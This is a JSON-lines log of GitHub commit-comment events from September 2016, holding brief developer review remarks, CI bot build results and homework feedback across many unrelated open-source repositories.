{"id":"4612856565","type":"CommitCommentEvent","actor":{"login":"techstalgist"},"repo":{"name":"techstalgist/foorumi"},"payload":{"comment":{"id":19159125,"position":21,"line":20,"path":"src/main/java/tikape/runko/domain/Viesti.java","commit_id":"5148af7ac0a69a066f93986e421482713500f7e6","created_at":"2016-09-24T17:09:35Z","updated_at":"2016-09-24T17:09:35Z","body":"this should be changed, when messages are created by users. Now timestamp is in Unix seconds, so it must be multiplied by 1000 to get the milliseconds."}},"created_at":"2016-09-24T17:09:35Z"}
{"id":"4612856645","type":"CommitCommentEvent","actor":{"login":"irvincalloway"},"repo":{"name":"mishoo/minesweeper"},"payload":{"comment":{"id":19159126,"position":4,"line":4,"path":"minesweeper.css","commit_id":"4e620a71a81a7628e3865c2c1de4fcef9c8742a1","created_at":"2016-09-24T17:09:39Z","updated_at":"2016-09-24T17:09:39Z","body":"Border: 2pk solid #000;"}},"created_at":"2016-09-24T17:09:39Z"}
{"id":"4612857930","type":"CommitCommentEvent","actor":{"login":"zebastian"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":19159132,"position":null,"line":null,"path":null,"commit_id":"63acb3a43917339996088c76f26d25881ecfd78e","created_at":"2016-09-24T17:10:31Z","updated_at":"2016-09-24T17:10:31Z","body":"x64 qt5.6 binary as artifact compiled and ready to download;\r\nhttps://ci.appveyor.com/project/zebastian/mandelbulber2-s84yl/build/1.0.13/job/rr7q0bo120moncs8/artifacts"}},"created_at":"2016-09-24T17:10:31Z"}
{"id":"4612858112","type":"CommitCommentEvent","actor":{"login":"techstalgist"},"repo":{"name":"techstalgist/foorumi"},"payload":{"comment":{"id":19159133,"position":54,"line":42,"path":"src/main/java/tikape/runko/Main.java","commit_id":"5148af7ac0a69a066f93986e421482713500f7e6","created_at":"2016-09-24T17:10:39Z","updated_at":"2016-09-24T17:10:39Z","body":"this is just to make it possible to stop the server. I could not think of a better solution."}},"created_at":"2016-09-24T17:10:39Z"}
{"id":"4612859734","type":"CommitCommentEvent","actor":{"login":"tanhanliang"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19159138,"position":null,"line":null,"path":null,"commit_id":"05db42dd731629b042ea036e94cbf812c03cc5c0","created_at":"2016-09-24T17:11:44Z","updated_at":"2016-09-24T17:11:44Z","body":"I should have split this into several smaller commits..."}},"created_at":"2016-09-24T17:11:44Z"}
{"id":"4612859918","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":19159139,"position":13,"line":200,"path":"src/pawns.cpp","commit_id":"0aafdd98542ebfb170c04a78949debbb4067b7ad","created_at":"2016-09-24T17:11:54Z","updated_at":"2016-09-24T17:11:54Z","body":"Historical note: \r\nThis was a mistake, should have been \r\n`score -= Islands[b] * Island;`\r\n\r\nOR\r\n\r\n`b = e->semiopenFiles[Us] ^ 0xFF;\r\nscore -= popcount<Max15>(b & ~(b >> 1)) * Island;`\r\n\r\nThis was corrected on the next test: \r\nhttp://tests.stockfishchess.org/tests/view/55ff02af0ebc5976a2d6df28\r\n"}},"created_at":"2016-09-24T17:11:54Z"}
{"id":"4612860283","type":"CommitCommentEvent","actor":{"login":"conciseandre"},"repo":{"name":"conciseandre/Kaggle"},"payload":{"comment":{"id":19159141,"position":null,"line":null,"path":null,"commit_id":"7a9cb3f3a5e16c6d7245aae12574c9edc9012cf3","created_at":"2016-09-24T17:12:09Z","updated_at":"2016-09-24T17:12:09Z","body":"SBS.py represents a sequential backwards selection algorithm in python. This creates an sbs object with input of estimator type, number of features as k_features, scoring parameters, test_size of data set and random state. Using this and the data sources, the best parameters are selected for prediction and the accuracy of each set of parameters are plotted and outputted.  "}},"created_at":"2016-09-24T17:12:09Z"}
{"id":"4612860938","type":"CommitCommentEvent","actor":{"login":"wonderwoman13"},"repo":{"name":"melissajstudent/koth"},"payload":{"comment":{"id":19159143,"position":null,"line":null,"path":null,"commit_id":"68841f9b26d355d7d9b6adb4a8b31086d84ea80f","created_at":"2016-09-24T17:12:38Z","updated_at":"2016-09-24T17:12:38Z","body":"Sounds like it! Take a look here: https://devcenter.heroku.com/articles/rails-asset-pipeline \r\nI wonder if this is Heroku-not-caught-up-on-Rails-5 but I doubt it. "}},"created_at":"2016-09-24T17:12:38Z"}
{"id":"4612862330","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-client-ruby"},"payload":{"comment":{"id":19159148,"position":null,"line":null,"path":null,"commit_id":"212328739438316f6a4cedf9c60b3506adb301ec","created_at":"2016-09-24T17:13:37Z","updated_at":"2016-09-24T17:13:37Z","body":"👍 "}},"created_at":"2016-09-24T17:13:37Z"}
{"id":"4612864251","type":"CommitCommentEvent","actor":{"login":"sourcefrog"},"repo":{"name":"sourcefrog/conserve"},"payload":{"comment":{"id":19159155,"position":12,"line":17,"path":"src/report.rs","commit_id":"df352c027d58a75131d5abb72bca05c208c22f82","created_at":"2016-09-24T17:15:03Z","updated_at":"2016-09-24T17:15:03Z","body":"etuoeuth"}},"created_at":"2016-09-24T17:15:03Z"}
{"id":"4612864999","type":"CommitCommentEvent","actor":{"login":"conciseandre"},"repo":{"name":"conciseandre/Kaggle"},"payload":{"comment":{"id":19159157,"position":null,"line":null,"path":null,"commit_id":"7a9cb3f3a5e16c6d7245aae12574c9edc9012cf3","created_at":"2016-09-24T17:15:32Z","updated_at":"2016-09-24T17:15:32Z","body":"RP.py is an implementation of regularization path method on the logistic regression method in sklearn. Using this we can also tune which parameters are used in prediction. Input values are the data frame, the data source X, corresponding y values, and the penalty, \"reg\"."}},"created_at":"2016-09-24T17:15:32Z"}
{"id":"4612865839","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":19159162,"position":5,"line":19,"path":"app/views/kaui/admin_tenants/_show_overdue.erb","commit_id":"4e6b96663f4063c2012d71dea3b633a53d484ff6","created_at":"2016-09-24T17:16:09Z","updated_at":"2016-09-24T17:16:09Z","body":"Shouldn't it be `!@overdue.has_states`?"}},"created_at":"2016-09-24T17:16:09Z"}
{"id":"4612868589","type":"CommitCommentEvent","actor":{"login":"CryptoCoderz"},"repo":{"name":"CryptoCoderz/Espers"},"payload":{"comment":{"id":19159168,"position":null,"line":null,"path":null,"commit_id":"e8c1b49a1257b8054156e2251cf3f243e91ec14c","created_at":"2016-09-24T17:18:11Z","updated_at":"2016-09-24T17:18:11Z","body":"Thank you, haven't gotten around to that just yet."}},"created_at":"2016-09-24T17:18:11Z"}
{"id":"4612870323","type":"CommitCommentEvent","actor":{"login":"croth1"},"repo":{"name":"soedinglab/hh-suite"},"payload":{"comment":{"id":19159171,"position":29,"line":457,"path":"scripts/cif2fasta.py","commit_id":"60484414240a75e4c690e6b2c7fcdb38cd218253","created_at":"2016-09-24T17:19:28Z","updated_at":"2016-09-24T17:19:28Z","body":"👎 "}},"created_at":"2016-09-24T17:19:28Z"}
{"id":"4612870542","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":19159172,"position":null,"line":null,"path":null,"commit_id":"0d60c459ff324cd460145f73215d28356d0a4e69","created_at":"2016-09-24T17:19:36Z","updated_at":"2016-09-24T17:19:36Z","body":"Hash sizes not same for base and test"}},"created_at":"2016-09-24T17:19:36Z"}
{"id":"4612870740","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":19159173,"position":62,"line":88,"path":"app/models/kaui/admin_tenant.rb","commit_id":"4e6b96663f4063c2012d71dea3b633a53d484ff6","created_at":"2016-09-24T17:19:45Z","updated_at":"2016-09-24T17:19:45Z","body":"Might be easier / safer to just serialize it as JSON?"}},"created_at":"2016-09-24T17:19:45Z"}
{"id":"4612871686","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19159178,"position":null,"line":null,"path":null,"commit_id":"fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000","created_at":"2016-09-24T17:20:24Z","updated_at":"2016-09-24T17:20:24Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1789 of 1789 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-24T17:20:24Z"}
{"id":"4612871790","type":"CommitCommentEvent","actor":{"login":"croth1"},"repo":{"name":"soedinglab/hh-suite"},"payload":{"comment":{"id":19159179,"position":73,"line":724,"path":"scripts/cif2fasta.py","commit_id":"60484414240a75e4c690e6b2c7fcdb38cd218253","created_at":"2016-09-24T17:20:30Z","updated_at":"2016-09-24T17:20:30Z","body":"s/!=/is not/"}},"created_at":"2016-09-24T17:20:30Z"}
{"id":"4612871795","type":"CommitCommentEvent","actor":{"login":"croth1"},"repo":{"name":"soedinglab/hh-suite"},"payload":{"comment":{"id":19159180,"position":84,"line":734,"path":"scripts/cif2fasta.py","commit_id":"60484414240a75e4c690e6b2c7fcdb38cd218253","created_at":"2016-09-24T17:20:30Z","updated_at":"2016-09-24T17:20:30Z","body":"s/!=/is not/"}},"created_at":"2016-09-24T17:20:30Z"}
{"id":"4612871809","type":"CommitCommentEvent","actor":{"login":"chrisbolin"},"repo":{"name":"FormidableLabs/formidable-playbook"},"payload":{"comment":{"id":19159181,"position":73,"line":58,"path":"docs/frontend/webpack-source-maps.md","commit_id":"85858421d46238dc19b6e4e81559ca890bca44eb","created_at":"2016-09-24T17:20:30Z","updated_at":"2016-09-24T17:20:30Z","body":"Very helpful clarity!"}},"created_at":"2016-09-24T17:20:30Z"}
{"id":"4612872390","type":"CommitCommentEvent","actor":{"login":"ThomasConnor"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19159183,"position":null,"line":null,"path":null,"commit_id":"76494e5f9ced188d15e218ac365b43cbd748f49d","created_at":"2016-09-24T17:20:54Z","updated_at":"2016-09-24T17:20:54Z","body":"Could the key be changed to toggle mip mapping in both HW and SW or is there some reason to keep them separate? Also please forgive my confusion here but doesn't the insert key just toggle \"m_mipmap\" (m_mipmap = !m_mipmap;). I can only see one mip map entry in the gsdx.ini config and thats toggled by the checkbox in the sw renderer section (sets mipmap=0/1 in the config). What is the other ini entry for hw mipmapping?\r\n\r\nAnd \"m_mipmap = theApp.GetConfigB(\"UserHacks_mipmap\");\" is in this commit for the HW renderer which makes it seem like theres only one variable for both.\r\n\r\nI can't see what I'm missing here, sorry to bother you."}},"created_at":"2016-09-24T17:20:54Z"}
{"id":"4612873057","type":"CommitCommentEvent","actor":{"login":"WickedShell"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19159185,"position":null,"line":null,"path":null,"commit_id":"6f29562e712959380668e1b672dbfe86e6eeb52a","created_at":"2016-09-24T17:21:23Z","updated_at":"2016-09-24T17:21:23Z","body":"Cvar is to be consistent with the captures and frags, but I do agree\notherwise\n\nOn Sep 24, 2016 04:28, \"Jay Dolan\" <notifications@github.com> wrote:\n\n> 👍 Thanks!\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jdolan/quetoo/commit/6f29562e712959380668e1b672dbfe86e6eeb52a#commitcomment-19157633>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAipiFIpzu0Frax3G_965AZQPRdSH6yKks5qtQlkgaJpZM4KFntj>\n> .\n>\n"}},"created_at":"2016-09-24T17:21:23Z"}
{"id":"4612876529","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19159196,"position":null,"line":null,"path":null,"commit_id":"fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000","created_at":"2016-09-24T17:23:52Z","updated_at":"2016-09-24T17:23:52Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-24T17:23:52Z"}
{"id":"4612876879","type":"CommitCommentEvent","actor":{"login":"18PatZ"},"repo":{"name":"HarkerGameDevelopmentClub/Tutorial-Project"},"payload":{"comment":{"id":19159198,"position":null,"line":null,"path":null,"commit_id":"7860fba6173ed8b42a97645b2359489badb4a08c","created_at":"2016-09-24T17:24:05Z","updated_at":"2016-09-24T17:24:05Z","body":"What matters is that we can't revert it"}},"created_at":"2016-09-24T17:24:05Z"}
{"id":"4612877618","type":"CommitCommentEvent","actor":{"login":"melissajstudent"},"repo":{"name":"melissajstudent/koth"},"payload":{"comment":{"id":19159200,"position":null,"line":null,"path":null,"commit_id":"68841f9b26d355d7d9b6adb4a8b31086d84ea80f","created_at":"2016-09-24T17:24:38Z","updated_at":"2016-09-24T17:24:38Z","body":"Actually, it fixed itself in a round about way. Running production locally caused Rails to automatically generate the public/asset files needed. When I saw these were added, I did another heroku push and it worked! :tada:"}},"created_at":"2016-09-24T17:24:38Z"}
{"id":"4612878821","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19159201,"position":null,"line":null,"path":null,"commit_id":"c68850c6be7e6e9ee0148280e4edb21ac9601f67","created_at":"2016-09-24T17:25:27Z","updated_at":"2016-09-24T17:25:27Z","body":"Oh, the wayland file sneaked in by mistake, but it's possible we'll use it anyway..."}},"created_at":"2016-09-24T17:25:27Z"}
{"id":"4612878952","type":"CommitCommentEvent","actor":{"login":"phrack"},"repo":{"name":"phrack/ShootOFF"},"payload":{"comment":{"id":19159202,"position":null,"line":null,"path":null,"commit_id":"90f535ec9513d9fe20eaacb7ef29efafbfc67da1","created_at":"2016-09-24T17:25:33Z","updated_at":"2016-09-24T17:25:33Z","body":"Yes, I'll fix it. My bad."}},"created_at":"2016-09-24T17:25:33Z"}
{"id":"4612879105","type":"CommitCommentEvent","actor":{"login":"mattyx14"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19159203,"position":null,"line":null,"path":null,"commit_id":"674fcc7471a2425b285855bd800347e7990d607d","created_at":"2016-09-24T17:25:38Z","updated_at":"2016-09-24T17:25:38Z","body":"this script style are for TFS 1.1\r\nand the previous is for TFS 1.2"}},"created_at":"2016-09-24T17:25:38Z"}
{"id":"4612880521","type":"CommitCommentEvent","actor":{"login":"Kentzo"},"repo":{"name":"zeromq/libzmq"},"payload":{"comment":{"id":19159206,"position":null,"line":null,"path":null,"commit_id":"2e3888dd45f878b18883b00cd08677392b5d02e0","created_at":"2016-09-24T17:26:44Z","updated_at":"2016-09-24T17:26:44Z","body":"@bluca I will open a PR with fix later today."}},"created_at":"2016-09-24T17:26:44Z"}
{"id":"4612883481","type":"CommitCommentEvent","actor":{"login":"chsakell"},"repo":{"name":"chsakell/dotnetcore-entityframework-api"},"payload":{"comment":{"id":19159212,"position":null,"line":null,"path":null,"commit_id":"010c92e77cc2c5a77b44c7a368d87f73b73dd6cc","created_at":"2016-09-24T17:28:54Z","updated_at":"2016-09-24T17:28:54Z","body":"Linux and MAC users may run the app by setting _\"InMemoryProvider\": true_ in the **Scheduler.API/appsettings.json**\r\n```\r\n{\r\n  \"Data\": {\r\n    \"SchedulerConnection\": {\r\n      \"ConnectionString\": \"Server=(localdb)\\\\v11.0;Database=SchedulerDb;Trusted_Connection=True;MultipleActiveResultSets=true\",\r\n      \"InMemoryProvider\": true\r\n    }\r\n  }\r\n}\r\n```"}},"created_at":"2016-09-24T17:28:54Z"}
{"id":"4612884650","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19159216,"position":null,"line":null,"path":null,"commit_id":"e9c7300a287939d3e533aea7271a047f61ab3c2d","created_at":"2016-09-24T17:29:46Z","updated_at":"2016-09-24T17:29:46Z","body":"Google translate -_-"}},"created_at":"2016-09-24T17:29:46Z"}
{"id":"4612885209","type":"CommitCommentEvent","actor":{"login":"Taapat"},"repo":{"name":"OpenPLi/enigma2"},"payload":{"comment":{"id":19159219,"position":15,"line":40,"path":"lib/python/Screens/Ci.py","commit_id":"53190b7886520b568c6d7df7ee27d8e342e99174","created_at":"2016-09-24T17:30:13Z","updated_at":"2016-09-24T17:30:13Z","body":"Why these numbers need translate?\r\nDo you think that anyone will want change them?"}},"created_at":"2016-09-24T17:30:13Z"}
{"id":"4612886276","type":"CommitCommentEvent","actor":{"login":"wonderwoman13"},"repo":{"name":"melissajstudent/koth"},"payload":{"comment":{"id":19159222,"position":null,"line":null,"path":null,"commit_id":"68841f9b26d355d7d9b6adb4a8b31086d84ea80f","created_at":"2016-09-24T17:30:56Z","updated_at":"2016-09-24T17:30:56Z","body":"That is fabulous. Well done! 🎉 "}},"created_at":"2016-09-24T17:30:56Z"}
{"id":"4612886678","type":"CommitCommentEvent","actor":{"login":"fangeugene"},"repo":{"name":"the-blue-alliance/the-blue-alliance"},"payload":{"comment":{"id":19159224,"position":null,"line":null,"path":null,"commit_id":"9901cc9ee74916e2a551928f1f036dd679801d49","created_at":"2016-09-24T17:31:12Z","updated_at":"2016-09-24T17:31:12Z","body":"Probably this https://github.com/the-blue-alliance/the-blue-alliance/blob/master/react/gameday2/components/EmbedTwitch.js#L14"}},"created_at":"2016-09-24T17:31:12Z"}
{"id":"4612887757","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19159225,"position":null,"line":null,"path":null,"commit_id":"35a865c0ed7a7c097ee555588e66630c76892064","created_at":"2016-09-24T17:31:59Z","updated_at":"2016-09-24T17:31:59Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2310 of 2496 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-35a865c0ed7a7c097ee555588e66630c76892064-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-35a865c0ed7a7c097ee555588e66630c76892064-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.55%25-yellow.svg)</a> \n"}},"created_at":"2016-09-24T17:31:59Z"}
{"id":"4612887958","type":"CommitCommentEvent","actor":{"login":"salens"},"repo":{"name":"salens/vezbe9"},"payload":{"comment":{"id":19159226,"position":4,"line":5,"path":"Hello.txt","commit_id":"21a4493f5d1f28c7385dbcb788b5d1e6b7a01f01","created_at":"2016-09-24T17:32:09Z","updated_at":"2016-09-24T17:32:09Z","body":"dodata nova izmena sa lokalnog brancha-a"}},"created_at":"2016-09-24T17:32:09Z"}
{"id":"4612888291","type":"CommitCommentEvent","actor":{"login":"MarkusHackspacher"},"repo":{"name":"unknown-horizons/unknown-horizons"},"payload":{"comment":{"id":19159227,"position":35,"line":92,"path":"development/networkclient.py","commit_id":"e23d68ba3aa9f8c277205dfb7dea016e57c74e18","created_at":"2016-09-24T17:32:23Z","updated_at":"2016-09-24T17:32:23Z","body":"Why use the file development/networkclient.py two spaces?"}},"created_at":"2016-09-24T17:32:23Z"}
{"id":"4612888501","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19159230,"position":null,"line":null,"path":null,"commit_id":"047f4a82a5b1e1dedc331e4dd79efbe138f36583","created_at":"2016-09-24T17:32:33Z","updated_at":"2016-09-24T17:32:33Z","body":"Shouldn't `DLIES` be changed also?"}},"created_at":"2016-09-24T17:32:33Z"}
{"id":"4612888533","type":"CommitCommentEvent","actor":{"login":"aliot2010"},"repo":{"name":"aliot2010/Programming_Lab1-c-"},"payload":{"comment":{"id":19159231,"position":null,"line":null,"path":null,"commit_id":"de85ed3541d4b9dd5983b8e1f5ebfd8dc0ea41b5","created_at":"2016-09-24T17:32:34Z","updated_at":"2016-09-24T17:32:34Z","body":"Реализовано не совсем как нужно (а лучше, с использование паттерна \"Декоратор\").\r\nКод пока еще не был сдан преподавателю."}},"created_at":"2016-09-24T17:32:34Z"}
{"id":"4612890705","type":"CommitCommentEvent","actor":{"login":"squiddy"},"repo":{"name":"unknown-horizons/unknown-horizons"},"payload":{"comment":{"id":19159236,"position":35,"line":92,"path":"development/networkclient.py","commit_id":"e23d68ba3aa9f8c277205dfb7dea016e57c74e18","created_at":"2016-09-24T17:34:09Z","updated_at":"2016-09-24T17:34:09Z","body":"We didn't really enforce a codestyle with tooling. So that's how you end up with two spaces, different naming conventions of variables/functions (underscore_function, camelCaseFunction) etc."}},"created_at":"2016-09-24T17:34:09Z"}
{"id":"4612892073","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19159240,"position":null,"line":null,"path":null,"commit_id":"76494e5f9ced188d15e218ac365b43cbd748f49d","created_at":"2016-09-24T17:35:10Z","updated_at":"2016-09-24T17:35:10Z","body":"So far, it is an hidden option because code isn't ready for prime time. I don't want to break everything.\r\n\r\nFull discussion here #1561 "}},"created_at":"2016-09-24T17:35:10Z"}
{"id":"4612892365","type":"CommitCommentEvent","actor":{"login":"ISazhyna"},"repo":{"name":"ISazhyna/first"},"payload":{"comment":{"id":19159242,"position":4,"line":2,"path":"hello.html","commit_id":"093848490dfa93f1d07a8a9765fc0bfe4167aa04","created_at":"2016-09-24T17:35:21Z","updated_at":"2016-09-24T17:35:21Z","body":"what is this?"}},"created_at":"2016-09-24T17:35:21Z"}
{"id":"4612892595","type":"CommitCommentEvent","actor":{"login":"tunnckoCore"},"repo":{"name":"juliangruber/isarray"},"payload":{"comment":{"id":19159244,"position":null,"line":null,"path":null,"commit_id":"5ccb3ceb49561cd262ff596994e2aa0dfad94da9","created_at":"2016-09-24T17:35:31Z","updated_at":"2016-09-24T17:35:31Z","body":"why v2? Can't see the reason."}},"created_at":"2016-09-24T17:35:31Z"}
{"id":"4612892934","type":"CommitCommentEvent","actor":{"login":"kaadmy"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19159246,"position":null,"line":null,"path":null,"commit_id":"6f29562e712959380668e1b672dbfe86e6eeb52a","created_at":"2016-09-24T17:35:48Z","updated_at":"2016-09-24T17:35:48Z","body":"Would it be possible to have a more customizable scoreboard?\r\nThere could be a scoreboard order CVar to change the order the stats appear in, an example would be `cg_scoreboard_order \"frags deaths captures\"`."}},"created_at":"2016-09-24T17:35:48Z"}
{"id":"4612894486","type":"CommitCommentEvent","actor":{"login":"sndnvaps"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":19159251,"position":null,"line":null,"path":null,"commit_id":"218604f5c8fd24ea0236bd3cd596bb6580fae8f9","created_at":"2016-09-24T17:37:00Z","updated_at":"2016-09-24T17:37:00Z","body":"@werty100  we need '#endif' to end the '#ifdef '"}},"created_at":"2016-09-24T17:37:00Z"}
{"id":"4612894616","type":"CommitCommentEvent","actor":{"login":"r3ntg3n"},"repo":{"name":"SupquS/homework"},"payload":{"comment":{"id":19159252,"position":11,"line":11,"path":"css homework/index.html","commit_id":"a6ad2c9d4da5e0722c4d54ee2a13b5ca310b1f7a","created_at":"2016-09-24T17:37:06Z","updated_at":"2016-09-24T17:37:06Z","body":"Заголовок можно обрамить `<header></header>`."}},"created_at":"2016-09-24T17:37:06Z"}
{"id":"4612894695","type":"CommitCommentEvent","actor":{"login":"gromolga"},"repo":{"name":"MaksymGrom/Blog-1"},"payload":{"comment":{"id":19159253,"position":null,"line":null,"path":null,"commit_id":"f21886f4d694b364f88c5078e5b0f280f1ea49b7","created_at":"2016-09-24T17:37:09Z","updated_at":"2016-09-24T17:37:09Z","body":"gfhgfh"}},"created_at":"2016-09-24T17:37:09Z"}
{"id":"4612895237","type":"CommitCommentEvent","actor":{"login":"chrisortman"},"repo":{"name":"chrisortman/CIS-121"},"payload":{"comment":{"id":19159254,"position":null,"line":null,"path":null,"commit_id":"4d09bd09bf7c968605585a5b0010a54924b67ca3","created_at":"2016-09-24T17:37:34Z","updated_at":"2016-09-24T17:37:34Z","body":"Quiz 1 again looks great"}},"created_at":"2016-09-24T17:37:34Z"}
{"id":"4612896817","type":"CommitCommentEvent","actor":{"login":"r3ntg3n"},"repo":{"name":"SupquS/homework"},"payload":{"comment":{"id":19159258,"position":19,"line":19,"path":"css homework/index.html","commit_id":"a6ad2c9d4da5e0722c4d54ee2a13b5ca310b1f7a","created_at":"2016-09-24T17:38:47Z","updated_at":"2016-09-24T17:38:47Z","body":"А для навигации используйте\r\n```html\r\n<nav>\r\n    <ul>\r\n        <li><a href=\"#\">Home</a></li>\r\n        <li><a href=\"#\">About us</a></li>\r\n        <li><a href=\"#\">Contacts</a></li>\r\n    </ul>\r\n</nav>\r\n```\r\n\r\nСемантика, все дела ;)"}},"created_at":"2016-09-24T17:38:47Z"}
{"id":"4612897755","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/rogue-test"},"payload":{"comment":{"id":19159260,"position":null,"line":null,"path":null,"commit_id":"2635e3bf6602ae458baeb9f98591c8ea93c0ff86","created_at":"2016-09-24T17:39:30Z","updated_at":"2016-09-24T17:39:30Z","body":"Also, rmove() has a new parameter which determines the number of times to move randomly"}},"created_at":"2016-09-24T17:39:30Z"}
{"id":"4612897782","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android_device_samsung_kyleprods"},"payload":{"comment":{"id":19159261,"position":null,"line":null,"path":null,"commit_id":"11531d664dd7632eb07f56ec61a242c10d3fa11c","created_at":"2016-09-24T17:39:32Z","updated_at":"2016-09-24T17:39:32Z","body":"This is a better way of implementing this:\r\nhttps://github.com/Osas514/android_device_samsung_i9082/commit/678861604acc0362499628a4b60f87d2e13e3903"}},"created_at":"2016-09-24T17:39:32Z"}
{"id":"4612898419","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android_device_samsung_kyleprods"},"payload":{"comment":{"id":19159263,"position":null,"line":null,"path":null,"commit_id":"11531d664dd7632eb07f56ec61a242c10d3fa11c","created_at":"2016-09-24T17:40:04Z","updated_at":"2016-09-24T17:40:04Z","body":"*this=it"}},"created_at":"2016-09-24T17:40:04Z"}
{"id":"4612898655","type":"CommitCommentEvent","actor":{"login":"r3ntg3n"},"repo":{"name":"SupquS/homework"},"payload":{"comment":{"id":19159266,"position":56,"line":56,"path":"html homework/continents.html","commit_id":"a6ad2c9d4da5e0722c4d54ee2a13b5ca310b1f7a","created_at":"2016-09-24T17:40:12Z","updated_at":"2016-09-24T17:40:12Z","body":"Ячейку забыли обрамить в строку `<tr>`:\r\n```html\r\n<thead>\r\n    <tr>\r\n        <th colspan=\"2\">Some continents and area</th>\r\n    </tr>\r\n</thead>\r\n```"}},"created_at":"2016-09-24T17:40:12Z"}
{"id":"4612899141","type":"CommitCommentEvent","actor":{"login":"mirh"},"repo":{"name":"lucasassislar/nucleuscoop"},"payload":{"comment":{"id":19159267,"position":null,"line":null,"path":null,"commit_id":"32ba7ddc6683f0f99853422264d8d52364b41aa0","created_at":"2016-09-24T17:40:31Z","updated_at":"2016-09-24T17:40:31Z","body":"So.. I just checked it out. \r\nBL2 might even have Steam CEG, still. \r\n\r\nBut it's not (at least directly?) using Steam DRM. I mean: when you launch it without steam running, the executable tells you you need steam running. But it's all but one of the usual Steam stub errors. \r\n\r\nSo I almost wonder if with that famous update.. they simply didn't remove that. "}},"created_at":"2016-09-24T17:40:31Z"}
{"id":"4612899361","type":"CommitCommentEvent","actor":{"login":"juliangruber"},"repo":{"name":"juliangruber/isarray"},"payload":{"comment":{"id":19159268,"position":null,"line":null,"path":null,"commit_id":"5ccb3ceb49561cd262ff596994e2aa0dfad94da9","created_at":"2016-09-24T17:40:39Z","updated_at":"2016-09-24T17:40:39Z","body":"i `npm deprecate`d this module and wanted to do so on a semver major version so people using the old one don't get all those annoying messages"}},"created_at":"2016-09-24T17:40:39Z"}
{"id":"4612902307","type":"CommitCommentEvent","actor":{"login":"revmischa"},"repo":{"name":"nosolosoftware/rtsp-server"},"payload":{"comment":{"id":19159284,"position":null,"line":null,"path":null,"commit_id":"ec71072dce6e7f6178844bfb5072021ff4bc467e","created_at":"2016-09-24T17:42:56Z","updated_at":"2016-09-24T17:42:56Z","body":"I'd love to know what these chages are but your commit messages are rather inscrutable "}},"created_at":"2016-09-24T17:42:56Z"}
